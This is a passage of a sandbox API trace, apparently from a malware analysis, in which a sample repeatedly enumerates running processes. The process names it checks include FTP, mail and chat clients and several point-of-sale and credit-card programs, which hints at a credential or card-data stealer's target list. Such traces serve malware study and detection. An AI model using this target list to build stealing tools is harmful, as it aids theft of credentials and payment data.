hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0210.635] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0210.637] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0210.641] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0210.642] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0210.643] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0210.645] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0210.646] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0210.648] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0210.649] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0210.650] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0210.671] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0210.673] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0210.674] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0210.675] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0210.677] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0210.678] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0210.680] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0210.681] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0210.685] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0210.687] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0210.688] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0210.690] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0210.691] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0210.693] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0210.695] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0210.696] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0210.701] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0210.702] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0210.704] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0210.706] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0210.707] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0210.709] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0210.711] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0210.713] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0210.765] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0210.767] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0210.769] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0210.771] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0210.773] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0210.774] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0210.779] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0210.781] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0210.782] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0210.784] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0210.786] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0210.787] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0210.789] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0210.791] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0210.795] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0210.797] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0210.798] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0210.800] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0210.807] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0210.808] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0210.810] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0210.812] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0210.813] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0210.815] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0210.816] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0210.818] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0210.819] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0210.821] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0210.822] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0210.827] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0210.828] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0210.830] CloseHandle (hObject=0xde8) returned 1 [0210.830] Sleep (dwMilliseconds=0x64) [0210.955] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0210.967] Process32First (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.969] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0210.971] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0210.972] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.974] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0210.975] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.977] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0210.978] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0210.982] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0210.984] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.985] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.987] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0210.988] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.989] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.991] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.992] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.994] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.082] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, 